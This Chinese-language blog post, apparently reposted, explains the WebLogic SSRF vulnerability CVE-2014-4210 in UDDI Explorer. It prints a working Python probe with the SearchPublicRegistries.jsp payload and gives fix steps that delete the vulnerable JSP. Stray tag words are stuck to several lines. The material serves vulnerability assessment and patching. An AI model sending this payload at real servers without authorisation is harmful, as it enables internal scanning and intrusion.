weblogic系列漏洞整理 -- 5. weblogic SSRF 漏洞 UDDI Explorer對外開放 (CVE-2014-4210)

1、weblogic安裝 http://www.cnblogs.com/0x4D75/p/8916428.htmlhtml

2、weblogic弱口令 http://www.cnblogs.com/0x4D75/p/8918761.htmlpython

3、weblogic 後臺提權 http://www.cnblogs.com/0x4D75/p/8919760.htmlgit

4、weblogic XMLDecoder 反序列化漏洞 http://www.cnblogs.com/0x4D75/p/8933028.htmlgithub

[TOC]web

5、 weblogic SSRF 漏洞 UDDI Explorer對外開放 (CVE-2014-4210)

影響版本:10.0.2,10.3.6shell

SSRF漏洞,也稱爲XSPA(跨站端口攻擊),問題存在於應用程序在加載用戶提供的URL時,沒能正確驗證服務器的響應,而後就反饋回了客戶端。攻擊者能夠利用該漏洞繞過訪問限制(如防火牆),進而將受感染的服務器做爲代理進行端口掃描,甚至訪問系統中的數據。服務器

1. 利用過程

完整利用腳本:https://github.com/b4zinga/Explib/blob/master/weblogic.pyjsp

def ssrf(self):
        """Version: 10.0.2/10.3.6
        CVE-2014-4210"""
        # payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001"
        payload = ":7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"

        req = requests.get(self.url+payload, timeout=10, verify=False)
        if "weblogic.uddi.client.structures.exception.XML_SoapException" in req.text and "IO Exception on sendMessage" not in req.text:
            print("[+] WebLogic ssrf")

2. 修復建議

​ Weblogic服務端請求僞造漏洞出如今UDDI組件(因此安裝Weblogic時若是沒有選擇UDDI組件那麼就不會有該漏洞),更準確地說是UDDI包實現包uddiexplorer.war下的SearchPublicRegistries.jsp。url

​ 因此修復這個漏洞最直接的方式就是刪除這個jsp頁面。spa

jar -xvf uddiexplorer.war 
rm  SearchPublicRegistries.jsp
jar -cvfM uddiexplorer.war uddiexplorer/
相關文章
相關標籤/搜索